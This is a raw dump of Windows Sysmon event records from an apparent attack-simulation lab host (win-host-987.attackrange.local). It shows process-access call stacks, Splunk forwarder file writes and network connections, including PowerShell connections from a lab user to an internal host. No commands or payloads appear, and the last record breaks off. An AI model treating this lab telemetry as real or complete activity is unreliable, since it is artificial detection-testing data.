10341000x800000000000000035084233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000035084230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.222{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
154100x800000000000000035084229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.204{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
23542300x800000000000000035084251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:45.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EB418F490A7FE1018C32373B7AA38D7,SHA256=6B85FABC5914BD15A64796E45E34E5CCB794053FA0452DF6DDFC0358D972A85C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:46.320{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1011A0660D316542ADF0E87E786CF9A9,SHA256=A47D5F0DD0877BD07D5E7BA9EF9A16BDB44FDEE6AE7357CFE19046014BFB94A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:46.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FFCAAE64BB97DEDA984B96AE98373AD,SHA256=7E57476C991BF213D7E81DAE41615281DF838137287EAF36772034D931EC5A95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:47.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0741FA96815DCBAB43F75F07C73440EC,SHA256=BA9C8EC6A191E48AD7A5994F4496098D2006C2AE0B9C5F5DC4637929C9CD2075,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:48.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=384392557BDB8EDDACD5FE2222BCDC4C,SHA256=F73DE121FB5E3FF5D765037A50AA2E378FF3C72398E589206CB5E108B7B0F1C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:48.383{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BC9C3F9F7A2C347B8676C3E661A4908,SHA256=F2B023D9E46CB445FEE3FFB26D6D77079DD1535E77A38FF1B311CF05FC2CB497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000035084258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.817{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56583-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:49.419{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20060033D2543074013FCE1DAA5FDC3B,SHA256=9FD6C04FAAB57B0DE11CBB206C25BE2D70BAE869788014C66DD6DF6240A2739B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:15.152{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56584-false10.0.1.12-8000- 23542300x800000000000000035084259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:50.450{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67250D1365C8692AE07D9D7136C2C396,SHA256=0A8778362C28CEFBFB792BB8D771341F49840E62B8E769C97DCDB37FE82E2603,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:51.472{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717ED9EC263A3142C569E840F9FF709F,SHA256=6C4309ECBA12D4A7F35BF070EC0B39B7D3157D6DA25349EEBE5524FBA830F1C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:52.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F616D8A873449A52A9A74E543A1F7E1,SHA256=F0E837E9BD66BBBA537069BFAB01C2A835E42C66FEDD4AEAF159656D8904150E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:53.501{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07AF66446B719A078A02BFEB900D9146,SHA256=067A1237957F4894FAA84F6CE8417357962743A8B425D1A98668F0EC66E51413,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:54.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D815192E55D3557EA96015D9A99B0009,SHA256=8D72D09BF03755558B45806EC960491699F45EC460A7488425CD41947D996957,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:54.820{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:54.519{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCDCCE07F09D063A341A28D547A750B5,SHA256=50AC02CAAFF310BAA1580C8033EEDEB2BCEDE6DED3E7010A6C4D0937F54953ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:55.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=090FA383A04AEF81E416C7570B1F4C47,SHA256=7644726A5255F38E2C69CB095DE3DAD86D97470454FC4CBE7ADF83CAF97D9024,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:56.652{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D48E9C8FAEA2E90FC145A7590782F1,SHA256=3BD9DB15BC3F14ECA4E09F36E6DA9C6E769AF2B84322838A25085F1160B2D0C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:19.818{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56585-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:57.682{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83118257B211CC73885ADAAE08CAA9A0,SHA256=0A8A1DC6843AF673033D1F82E5B815ECBBDC33B666F0C66B0E211F954107B6F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:21.086{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56587-false10.0.1.12-8000- 354300x800000000000000035084270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:20.816{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56586-false10.0.1.12-8089- 23542300x800000000000000035084273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:58.697{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBF1411694E9034D06A2C6AAA5C50B34,SHA256=F151096CCD217E63C89981ED1590270F186223CA80B57C1282AEB8292770F001,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 